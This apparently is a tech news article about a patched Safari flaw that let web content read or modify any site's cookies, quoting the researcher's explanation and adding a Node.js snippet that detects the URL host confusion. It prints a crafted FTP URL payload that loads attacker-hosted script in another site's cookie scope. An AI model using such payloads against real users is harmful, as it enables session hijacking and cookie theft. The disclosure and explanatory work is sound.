Apple Patches Safari Cookie Vulnerability

A security researcher in Finland has revealed the details of a potentially nasty flaw with Apple’s Safari web browser.

It comes after Apple patched the flaw with its Safari 8.0.5 update last week.

Flawed

“The 4/8/2015 security updates from Apple included a patch for a Safari cross-domain vulnerability,” blogged Jouko Pynnönen, from Finnish security firm Klikki Oy.

“An attacker could create web content which, when viewed by a target user, bypasses some of the normal cross-domain restrictions to access or modify HTTP cookies belonging to any website,” Pynnönen wrote.

“Most websites which allow user logins store their authentication information (usually session keys) in cookies. Access to these cookies would allow hijacking authenticated sessions. Cookies can also contain other sensitive information,” he warned.

It seems the problem affected all versions of the Safari web browser, on iOS, OS X, and Windows machines. This includes Safari 7.0.4 on OS X 10.9.3; Safari on iPhone 3GS, iOS 6.1.6; Safari on iOS 8.1 simulator; and Safari 5.1.7 on Windows 8.1.

“The number of affected devices may be of the order of 1 billion,” he warned.

So how does the vulnerability work? Well, Pynnönen pointed out that Safari supports the FTP URL scheme, which allows HTML documents to be loaded from URLs beginning with “ftp://”. These URLs can take the form ftp://user:password@host/path. The problem arises when percent-encoded special characters such as “@”, “/” and “#” appear in the user or password part.

For example, consider the following URL:
ftp://user%40ftp.attacker.tld%2Fexploit.html%23@apple.com/

If correctly interpreted, the URL refers to a document on apple.com: everything before the final “@” is the (percent-encoded) user name, and the host is apple.com. However, when loaded by a vulnerable browser, the network layer uses an extraneously decoded version of the URL:

ftp://user@ftp.attacker.tld/exploit.html#apple.com/

The document would be loaded from ftp.attacker.tld, not apple.com. Yet the document properties such as document.domain and document.cookie are correctly initialised using apple.com.

The attacker-supplied document, exploit.html, can therefore access and modify cookies belonging to apple.com via JavaScript.
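As an added illustration (not code from the article or from Pynnönen’s advisory), the Node.js snippet below models the two parsing paths described above: a correct WHATWG-style parse, which a browser should use to derive document.domain, and a simulated buggy path that percent-decodes the whole URL once before parsing. The single-decode model is an assumption about how the decoded form shown above arises, not a description of Safari’s actual implementation. The comparison also doubles as a generic regression check for any component that parses a URL twice: if the host seen after decoding differs from the host seen before, the URL is a confusion candidate.

```javascript
// Added illustration, not Safari's code nor Pynnönen's: models the two
// URL-parsing paths the article describes and flags the divergence.
// Assumption: the "extraneously decoded" network-layer behaviour is modelled
// as one extra percent-decoding pass over the whole URL before re-parsing.
// Runs under Node.js, whose global URL class follows the WHATWG URL Standard.

// Correct parse: the host is whatever follows the LAST '@' in the authority,
// so percent-encoded '@', '/' and '#' in the user part stay inside the
// username. This is the host a browser should derive document.domain from.
function originHost(rawUrl) {
  return new URL(rawUrl).host;
}

// Simulated bug: decode percent-escapes first, then parse. The decoded '@'
// now terminates the credentials early, '/' starts a path and '#' turns the
// real host into a fragment. A malformed escape (e.g. '%ZZ') makes
// decodeURIComponent throw; treat that as "no extra decoding happened".
function extraneouslyDecodedHost(rawUrl) {
  let decoded;
  try {
    decoded = decodeURIComponent(rawUrl);
  } catch (e) {
    decoded = rawUrl;
  }
  return new URL(decoded).host;
}

// Compare the two views of the same URL. A mismatch is exactly the condition
// that lets attacker-hosted script run with another site's cookie jar:
// the document is fetched from `fetched` but scoped to `expected`.
function analyse(rawUrl) {
  const expected = originHost(rawUrl);
  const fetched = extraneouslyDecodedHost(rawUrl);
  return { expected, fetched, confused: expected !== fetched };
}

// Constructed inputs: the article's payload and a harmless FTP URL.
const PAYLOAD = 'ftp://user%40ftp.attacker.tld%2Fexploit.html%23@apple.com/';
const BENIGN = 'ftp://user:secret@apple.com/pub/';

for (const u of [BENIGN, PAYLOAD]) {
  const r = analyse(u);
  console.log(u);
  console.log('  origin host (correct parse):   ' + r.expected);
  console.log('  fetch host (decoded re-parse): ' + r.fetched);
  console.log('  confused:                      ' + r.confused);
}
```

For the payload, the correct parse yields apple.com while the decoded re-parse yields ftp.attacker.tld; for the benign URL both agree. In the real attack, exploit.html served from ftp.attacker.tld would simply read or write document.cookie, which the browser scopes to apple.com because of the first parse.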

Pynnönen has also published a vulnerability checker page with which worried Safari users can test whether their browser is affected.

Security Record

Apple generally has a good reputation, although there have been a number of problems to do with the Safari web browser over the years.

This time last year, for example, Apple had to patch 27 bugs in Safari that could have allowed hackers to target Safari users via specially crafted sites.

And last August, Apple had to issue a security update for Safari that fixed a WebKit vulnerability that could have allowed the execution of arbitrary code if a user visited a malicious website.

Other problems with Safari have also been exposed in the past which has resulted in Apple issuing patches.


Tom Jowitt

Tom Jowitt is a leading British tech freelancer and long standing contributor to Silicon UK. He is also a bit of a Lord of the Rings nut...
